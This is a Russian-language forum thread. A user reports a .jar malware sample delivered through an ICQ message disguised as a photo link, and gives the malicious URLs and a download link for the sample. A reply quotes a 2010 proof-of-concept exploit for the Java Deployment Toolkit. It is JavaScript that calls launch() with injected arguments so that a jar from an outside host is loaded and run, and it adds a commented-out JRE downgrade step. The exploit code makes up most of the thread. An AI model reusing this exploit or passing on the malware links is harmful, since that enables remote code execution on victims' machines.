Зверушка попалась на Java

karabas-barabas

(L1) cache
Пользователь
Регистрация
18.07.2006
Сообщения
650
Реакции
5
сегодня в асику пришла такая мессага
Код:
[08:33] 634951655: Никого не узнаешь на фото?)
http://xseksx.ru/x/70/dl/223/foto2.jpg
в итоге сервак отдал такую ссылку http://xseksx.ru/x/70/dl/223/foto2.jar

а вот и сам зверек http://exfile.ru/113750
Если кто в Java шарит, посмотрите что он вообще делает
 
интересно
Код:
A harmless demonstration is provided below.
http://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html
 
<html>
<head><title>Java Deployment Toolkit Test Page</title></head>
<body>
    <script>
        // Tavis Ormandy <taviso@sdf.lonestar.org>, April 2010
 
        var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";
 
        if (window.navigator.appName == "Microsoft Internet Explorer") {
            var o = document.createElement("OBJECT");
 
            o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
 
            // Trigger the bug
            o.launch(u);
        } else {
            // Mozilla
            var o = document.createElement("OBJECT");
            var n = document.createElement("OBJECT");
 
            o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
            n.type = "application/java-deployment-toolkit";
            document.body.appendChild(o);
            document.body.appendChild(n);
 
            // Test both MIME types
            try {
                // Old type
                o.launch(u);
            } catch (e) {
                // New type
                n.launch(u);
            }
        }
 
        // Bonus Vulnerability, why not downgrade victim to a JRE vulnerable to
        // this classic exploit?
        // http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1
 
        // o.installJRE("1.4.2_18");
    </script>
</body>
</html>
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх